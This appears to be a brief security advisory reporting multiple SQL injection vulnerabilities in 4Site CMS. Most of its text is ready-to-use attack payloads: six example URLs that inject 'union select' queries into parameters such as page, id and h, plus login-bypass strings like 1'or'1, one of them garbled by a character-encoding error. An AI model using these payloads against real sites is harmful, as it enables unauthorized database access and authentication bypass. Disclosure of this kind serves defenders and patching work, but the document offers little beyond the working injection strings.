|
|
4Site CMS Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues. The following example URIs are available: http://www.example.com/print/print.shtml?page=-1+union+select+1 http://www.example.com/portfolio/index.shtml?s=1&i=-1+union+select+1,2,3,4,5,6,7,8,9 http://www.example.com/portfolio/index.shtml?s=-1+union+select+1 http://www.example.com/hotel/?h=-1+union+select+1 http://www.example.com/news/news1.shtml?id=-1+union+select+1,2,3,4 http://www.example.com/faq/index.shtml?th=-1+union+select+1 The following example data is available: Login: 1'or'1 Password: 1'orâ??1 |
|
Privacy Statement |